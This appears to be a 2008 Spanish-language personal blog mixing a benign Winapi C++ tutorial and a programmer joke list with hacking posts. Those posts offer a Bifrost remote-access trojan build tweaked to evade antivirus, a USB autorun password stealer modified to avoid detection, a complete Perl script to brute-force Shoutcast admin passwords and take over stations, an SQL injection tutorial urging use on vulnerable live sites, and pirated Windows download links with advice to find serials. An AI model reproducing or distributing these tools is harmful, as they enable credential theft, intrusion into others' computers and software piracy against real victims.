Blog de Jorge Esteban


Windows XP Pro SP3 o Windows XP Pro SP2 x64 Edition?
julio 23, 2008, 4:16 am
Filed under: Pensamientos

Como todos saben soy un feliz usuario de Windows XP y Debian 4.1 Lenny (Vista apesta) y una laptop dell inspiron 1520, la cual tiene procesador core 2 duo y 2 gigas de ram(y nadamas para presumir una tarjeta grafica nvidia geforce 8600 directx 10)… esto quiere decir que soporta instrucciones de 64 bits… actualmente Windows XP Professional con Service pack 3(32 bits), no me ha dado problemas a excepcion de uno algo molesto… (si tengo la tarjeta wireless habilitada, tarda 5 minutos en cargar al arranque; solucion temporal: deshabilitar la tarjeta y solo habilitarla cuando la necesite) todo me funciona perfecto, en programas todos son compatibles(algo que vista debería aprender) y sobre todo me va muy rapido(ademas que hice mi instalacion lite, para que pesara muchisimo menos… 130 megas sin toda la basura como juegos y cosas inutiles), esto testeandolo en mi inspiron 1520 y en una PC armada con procesador Athlon XP a 2.0 ghz y 512 de ram DIMM(bastante lentas estas memorias)!! con la cual si se nota la super diferencia de optimizacion del SP2 y el SP3… sinceramente ando muy feliz con este OS, mi computadora vuela por los cielos… hasta el emulador de play station 2 me va a 40 fps… pero hace poco me entro la mania de instalar otra vez Windows XP x64 que obviamente esta hecho para procesadores de 64 bits (como el mio) y como sabran 64 bits de instrucciones permite una ejecucion mucho mas rapida en un calculo computacional… y algo mas importante, es que proximamente todos tendremos que utilizar esta tecnologia… esto es por los limites de memoria ram todos sabemos que la memoria ram cada dia esta mas barata y el maximo disponible por el momento son 4 gigas… no se puede mas(por lo menos en 32 bits y sin adaptadores por software que van bastante mal), por que? por que las instrucciones de 32 bits solo pueden alocar esta cantidad como maximo, hagan el calculo, 2 (que es la base del codigo binario)^32(tamaño de instruccion) = 4294967296 bytes = 4 gigas, ahora haganlo con 64 les va a dar algo en terabytes(este es el limite de ram de los 64 bits)!!! si no creen esto ¬¬ googleenlo es verdad, los 64 bits nos permitiran aumentar mucho mas en ram que los 32 que estan limitados a solo 4 gigas (que en su tiempo eran inalcanzables) y pues ya veremos en un par de añitos… pero bueno, yo solo tengo mis 2 gigas de ram, pero aun tengo la ventaja de que la potencia de ejecucion es mas elevada, es por eso que quiero este windows!! cualquiera diria (pss instala windows xp sp3 x64) pero no existe, windows xp x64 esta basado en el nucleo 5.1 de windows server 2003 y windows xp es totalmente aparte con el nucleo 5.0… cosa que hace que windows xp x64 ademas de ya casi estar injustamente descontinuado dependa de windows server 2003 el cual va en su sp2, sera una desicion dificil de tomar, pero creo que probare un rato con los 64 bits… les dejo los links para descargar Windows XP SP3 y Windows XP x64 SP2 ahi hagan sus conclusiones ustedes obviamente si tienen un pentium 4 no podran usar 64 bits…

Windows XP x64 (solo esta en ingles, pero esta el paque mui para que lo traduzcan)

Link 1

Link 2

Link 3

Link 4

Link 5

Link 6

Windows XP Professional SP3 en español

Link 1

Link 2

Link 3

Link 4

Link 5

Link 6

Los seriales pues ya busquenle… basta con poner serial windows xp oro (o x64) en google y sale…



Inyeccion SQL
junio 22, 2008, 4:50 am
Filed under: Video Tutos | Etiquetas: , ,

Hola muchas gracias a todos los usuarios que han estado aqui en el blog jejeje parece que si he tenido algunos cuantos usuarios eso me agrada, lo que pongo aqui es para ustedes, tambien lo de mi web solo que tuve problemillas con el hosting y se me dificulta mucho subir ficheros asi que abri este blog… bien al grano este video la verdad esta un poco largo jeje no me medi en el tiempo dura casi 30 mins (obvio lo pueden adelantar), pesa 11 megas comprimido en 7zip, descomprimido pesa 1.8 gygas jejeje es sobre como hacer una inyeccion sql en una web con PHP/mysql y obtener informacion sensitiva por medio de consultas utilizando el comando union que nos permite hacer 2 consultas en una, la pagina web que utilize para el tuto ya fue parcheada (ya le informe al administrador acerca del bug y lo arreglo) asi que no servira con esta misma, pero no se preocupen hay millones de paginas con esta vulnerabilidad y se siguen creando dia tras dia nuevas asi que chequenlo y cualquier dudilla no solo de esto, de lo que sea, si les puedo ayudar, aqui andamos solo dejen comment…

Descargar



Api Windows en C++ (Winapi)
junio 19, 2008, 2:35 am
Filed under: Manuales X mi

Api Windows(Winapi) con Visual C++ 6.0

VC

Esta vez veremos como programar en C++ con la api de windows (Winapi) obviamente para hacer programas con interfaz grafica y todo el pedo en C++…  pues les voy a dejar lo mas sencillo y unos tutos ya con mas cosas para que empiezen a trabajar con la winapi, al principio diras “que demonios? el jez esta loco” por que se utilizan muchas constantes clases y funciones, pero ya que lo domines veras que es muy divertido, ademas de que controlando la winapi, se te hará mucho mas facil utilizar interfaz grafica con GTK o KDE en GNU\Linux utilizando C++ (es mas complejo utilizar winapi que estas 2)… empezemos, daré por hecho que tienes las bases de C++ (que es una funcion, una clase, una constante ¬¬ una variable…) recomiendo utilizar Visual C++ 6.0 ya que este es el compilador por excelencia de aplicaciones C++ con winapi en Windows y no utiliza la tecnologia .net, ir a File>>New, seleccionar “Win32 Application” y poner nombre y ubicación, luego seleccionar “a simple Win32 Application” , nos generara el siguiente codigo:

 #include “stdafx.h”

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
  // TODO: Place code here.

 return 0;
}

La primera linea nos incluye la libreria stdafx.h que es una estandarizacion de la libreria “windows.h” a la cual manda a llamar (windows.h es la principal, stdafx.h solo es para estandarizar) dentro de windows.h esta todo el codigo que necesitamos para crear nuestras ventanas, etc… siguiente linea.

Todos lo mas seguro es que te hallan dicho que en C++ tu programa se ejecutaria desde la funcion main(), y que era la funcion mas importante y x… pues olvidalo, para winapi, se utilizara WinMain con sus 4 parametros, estos son de rigor y no se cambian, pondre explicacion de cada parametro

>HINSTANCE hinstance: Es un handle(apuntador) a la instancia de nuestro programa.
>HINSTANCE hPrevInstance: Ya no se utiliza, se sigue poniendo por compatibilidad pero no es importante.
>LPSTR lpCmdLine: Es un puntero que apunta a una cadenas de caracteres de los parametros enviados al abrir nuestro programa por ejemplo desde ms-dos “miprograma.exe -desinstalar” enviara -desinstalar.
>int CmdShow: Este parametro sirve para indicarle a nuestro programa como se abrira la ventana principal de nuestro programa (maximizado, normal, minimizado) los valores pueden ser: SW_SHOWNORMAL, SW_MAXIMIZE o SW_MINIMIZE

como ven son muchas constantes, pero ya que se explicaron no se ve tan dificil y se ve lógico… bien sigamos
la libreria windows.h dentro tiene una clase llamada WNDCLASSEX la cual nos va a servir para darle las propiedades a nuestra ventana (botones, tamaño, icono, etc) la clase, es la siguiente:

typedef struct _WNDCLASSEX {
 UINT cbSize;    
 UINT style;    
 WNDPROC lpfnWndProc;
 int cbClsExtra;    
 int cbWndExtra;    
 HANDLE hInstance;    
 HICON hIcon;    
 HCURSOR      hCursor;
 HBRUSH hbrBackground;    
 LPCTSTR      lpszMenuName;
 LPCTSTR      lpszClassName;
 HICON hIconSm;    
} WNDCLASSEX;  

no se necesita declarar ni meterla en nuestro codigo (ya viene incluida en windows.h)solo la pongo para que la observen…  basta con que en nuestro programa declaremos una variable del tipo WNDCLASSEX, y vayamos llenando los datos… no llenaré todos solo los mas necesarios, pero en los tutos viene todo explicado con peritas y manzanas…

int winmain(…
WNDCLASSEX WindowsRifa; // Variable del tipo WNDCLASSEX

WindowsRifa.cbSize = sizeof(WNDCLASSEX); // Es el tamaño de WNDCLASSEX en bytes, siempre poner esta asi.
WindowsRifa.style = CS_OWNDC | CS_HREDRAW | CS_VREDRAW; // Estilo de la ventana
etc)
WindowsRifa.hInstance = hinstance; //este es el handle pasado a WinMain()
WindowsRifa.lpszClassName = “miVentana” //aqui le ponemos un nombre a nuestra clase, pongan el nombre de su programa sin espacios
WindowsRifa.lpfnWndProc = Eventos; // Nombre de nuestra Funcion que manejara los eventos (abrir, cerrar, click,
WindowsRifa.cbClsExtra = 0; // pongalo asi siempre es informacion de la clase, no se utiliza
WindowsRifa.cbWndExtra = 0; // igual, pero informacion de la ventana, ponganlo asi siempre
WindowsRifa.hIcon = LoadIcon(NULL, IDI_APPLICATION);//Cargar icono por defecto en windows…
WindowsRifa.hCursor = LoadCursor(NULL, IDC_ARROW); // Cargar Cursor por defecto de windows
WindowsRifa.hbrBackground = (HBRUSH)(COLOR_WINDOW+1); //cargar color por defecto para las ventanas de windows

ya llenamos los datos!!! ahora debemos registrar nuestra clase, esto va con la funcion RegisterClassEx() y de parametro lleva la direccion de nuestra clase RegisterClassEx(&WindowsRifa);

ya terminamos!! solo falta ejecutar nuestra ventana, esto se hace con la funcion CreateWindowEx, la cual recibe otra vez un buen de parametros…
esta es la funcion, no necesita declararse por que ya viene en windows.h solo la pongo para que la observen

HWND CreateWindowEx {
DWORD dwExStyle,        // Estilo extendido de nuestra window
LPCTSTR lpClassName,    // Apuntador a la clase de la clase que registramos
LPCTSTR lpWindowName,   // Puntero al nombre de nuestra ventana
DWORD dwStyle,          // Estilo de ventana
int x,                  // Posicion en el eje x de nuestra ventana
int y,                  // Posicion en el eje y de nuestra ventana
int nWidth,             // Ancho de nuestra ventana
int nHeight,            // Alto de nuestra ventana
HWND hWndParent,        // Apuntador al manejador padre de nuestra ventana
HMENU hMenu,            // Apuntador a alguna barra de menu
HINSTANCE hInstance,    // Apuntador a la instancia de nuestro programa
LPVOID lpParam          // Apuntador a los datos de nuestra ventana
);

Ponemos la funcion y llenamos los datos conforme nos los pide:

CreateWindowEx(
        NULL,
        “miVentana”,
        “Titulo!”,
        WS_OVERLAPPEDWINDOW,
        CW_USEDEFAULT, CW_USEDEFAULT, 240, 120,
        NULL, NULL, hInstance, NULL);

listo!!! terminamos, solo nos queda compilar y ejecutar y veremos nuestra hermosa ventana!!, esto es solo el principio!! no es muy laboreoso ya con practica, ya solo les falta estudiar los archivos de recursos que son con los que podremos poner botones, cajas de texto, texto label, barras, etc… eso viene en los manuales, que les dejo!!

 manualezWinApi.7z



Los programadores de verdad
junio 7, 2008, 5:22 pm
Filed under: Pensamientos

Esto no lo pense yo, lo encontre en una pagina web jejeje y me dio risa me falta mucho todavia para ser un programador de verdad:

Los programadores de verdad no necesitan comentarios — el código es obvio.

Los programadores de verdad no documentan. La documentación es para los idiotas que no pueden leer un volcado de memoria.

Los programadores de verdad pueden escribir bucles de 5 páginas sin confundirse.

Los programadores de verdad escriben su código en binario. O como mucho ensamblador.

Los programadores de verdad escriben código automodificable, especialmente si con ello consiguen ahorrar 20 nanosegundos en un bucle.

Los programadores de verdad no tienen miedo a usar GOTOs.

Los programadores de verdad procesan listas usando C++.

Los programadores de verdad desarrollan programas de Inteligencia Artificial en C++ (si no puedes hacerlo en C++, hazlo en ensamblador).

Los programadores de verdad trabajan para la Agencia de Seguridad Nacional, decodificando transmisiones rusas.

Los programadores de verdad no comentan su código. Si fue difícil escribirlo, debería ser difícil entenderlo, y más difícil de modificar.

Los programadores de verdad no programan en BASIC. De hecho, ningún programador escribe en BASIC después de la pubertad.

Los programadores de verdad no programan en LISP. Sólo los idiotas escriben programas con más paréntesis que código.

Los programadores de verdad no usan FORTRAN. FORTRAN es para ingenieros débiles que usan calcetines blancos.

Los programadores de verdad no escriben especificaciones. De hecho, los usuarios deberían dar gracias de obtener algo de nosotros. Tienen suerte de que decidamos entregarles el programa.

Los programadores de verdad no leen manuales. El uso de manuales de referencia es para los novatos y los cobardes.

Los programadores de verdad no dibujan diagramas de flujo. Un diagrama de flujo no es más que documentación para analfabetos. Los cavernícolas dibujaban diagramas de flujo; y mira dónde están ahora.

Los programadores de verdad piensan que la programación estructurada es un invento de los comunistas.

Los programadores de verdad no creen en los plazos. Los supervisores establecen los plazos. Los jefes los firman. Los programadores asustadizos se esfuerzan en cumplirlos. Los programadores de verdad ignoran los plazos.

A los programadores de verdad no les gusta el concepto de programación en equipo. A menos que les asignen el puesto de programador jefe, claro.

Los programadores de verdad usan 5 dígitos para las fechas, y están preparados para el problema del año 10.000.

Los programadores de verdad no prueban el código, los usuarios se inventaron para eso.



Bifrost 1.2 Private
junio 5, 2008, 1:41 am
Filed under: Software

Aqui, claro no podian faltar los troyanos, les dejo este que es mi favorito, el mismisimo Bifrost 1.2, esta version es private es un poco menos detectada por los antivirus que la normal, viene ya descomprimida osea que es mas facil pasarle crypters para indetectarlo, yo la recomiendo, luego les pongo un manual para los novatillos y pues no hace falta mas explicacion, conexion inversa, keylogger, transferencia de archivos, rootkit, inyeccion por dll, etc muchisimas opciones muy gratas de este que para mi es de los mejores troyanos.

Descargar:

Bifrost_1.2b_Private_Build.rar



Te caga alguna radio Shoutcast? Robatela…
junio 5, 2008, 1:29 am
Filed under: Scripts

Como dice el titulo del post, con este script en PERL (necesitas perl en linux ó active perl para Windows)  podras atacar servidores shoutcast via fuerza bruta, la contraseña de estos server siempre es “admin” asi que no es tan tedioso ya que solo es forzar la contraseña y dependiendo tu conexion y tu PC saldra en x tiempo… ademas solo es de ponerlo en un bloc de notas y guardarlo con extension .pl… en linux lo mismo. solo se modifica la ruta de PERL en la cabecera

#!C:\perl\bin
##########################
# Shoutcast admin password bruteforce
#

use IO::Socket;
system (“cls”);
#system (“gcc -o ./bin/hack ./src/hack.c”);
print “\n”;
$host=$ARGV[0];
$port=$ARGV[1];
$brute=$ARGV[2];
if(!$hostname)
{
print “\n”;
print “\t::: Outpost24 Security :::\n”;
print “David Jacoby – dj\@outpost24.com – http://www.outpost24.com\n\n”;
print “Usage: ./program <hostname> <port> [brute/dict]\n\n\n”;
}
else{};

if ($brute eq “brute”)

{
for $pass (a .. zzzzzzzzzz)
{
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\tAttacking $host using the following password: $pass\n”;
$EOL = “1512”;
$BLANK = $EOL;
$BLANK1 = $EOL;
$remote = IO::Socket::INET->new( Proto => “tcp”,
PeerAddr => $host,
PeerPort => $port,
);
unless ($remote) { die “cannot connect to http daemon on $host” }
$remote->autoflush(1);
print $remote “GET /admin.cgi?pass=$pass HTTP/1.1 $BLANK” .
“Host: pewp.hack.se:8000 $BLANK” .
“User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 $BLANK” .
“Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 $BLANK” .
“Accept-Language: en-us, en;q=0.50 $BLANK” .
“Accept-Encoding: gzip, deflate, compress;q=0.9 $BLANK” .
“Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66 $BLANK” .
“Keep-Alive: 300 $BLANK” .
“Connection: keep-alive $BLANK” .
“Cache-Control: max-age=0 $BLANK” . $BLANK1;
while ( <$remote> )
{
if (/interface/)
{

system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\t\t\t ::: SUCCESS :::\n\n”;
print “\t\t\t\t\t\tHostname: [$host]\n”;
print “\t\t\t\t\t\tPassword: [$pass]\n\n\n”;
exit 0
}
}
close $remote;
};
};

if ($brute eq “dict”)
{
open (InFile, “./dict/dict.txt”) || die;
$count = 0;
while ($pass = <InFile>)

{
chop ($pass);

use IO::Socket;
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\tAttacking $host using the following password: $pass\n”;
$EOL = “1512”;
$BLANK = $EOL;
$BLANK1 = $EOL;
$remote = IO::Socket::INET->new( Proto => “tcp”,
PeerAddr => $host,
PeerPort => $port,
);
unless ($remote) { die “cannot connect to http daemon on $host” }
$remote->autoflush(1);
print $remote “GET /admin.cgi?pass=$pass HTTP/1.1 $BLANK” .
“Host: pewp.hack.se:8000 $BLANK” .
“User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 $BLANK” .
“Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 $BLANK” .
“Accept-Language: en-us, en;q=0.50 $BLANK” .
“Accept-Encoding: gzip, deflate, compress;q=0.9 $BLANK” .
“Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66 $BLANK” .
“Keep-Alive: 300 $BLANK” .
“Connection: keep-alive $BLANK” .
“Cache-Control: max-age=0 $BLANK” . $BLANK1;

while ( <$remote> )
{
if (/interface/)
{
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\t\t\t ::: SUCCESS :::\n\n”;
print “\t\t\t\t\t\tHostname: [$host]\n”;
print “\t\t\t\t\t\tPassword: [$pass]\n\n\n”;
exit 0
}
}

close $remote;

};
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\t\t\t ::: DAMN DAMN! :::\n\n”;
print “\t\t\t\t\t\tHostname: [$host]\n”;
print “\t\t\t\t\t\tPassword: UNABLE TO FIND PASSWORD!\n\n\n”;
exit 0

};



USB Roba Datos
junio 5, 2008, 1:21 am
Filed under: Software

Aqui les dejo este excelente soft… que finalidad tiene? robar contraseñas, desde hi5, msn, gmail y muchas cosas utiles mas almacenadas en la computadora de tu victima, como funciona? se instala en tu memoria usb y via autorun  al conectar tu memoria en cualquier maquina, este programa sacara los datos de la PC y los guardara en la carpeta Dump de tu memoria en formato HTML. Solo tiene un problema! es detectado por los antivirus… pero jejeje no se preocupen, aqui pienso por todos y le modifique el PE y la compresion al ejecutable y listo ya no sera detectado por los antivirus, asi que saquen datos con su usb… espero les sea util… aqui les dejo una screencap de los datos que arroja:

Free Image Hosting at www.ImageShack.us

QuickPost

Link:

RobaDatos.7z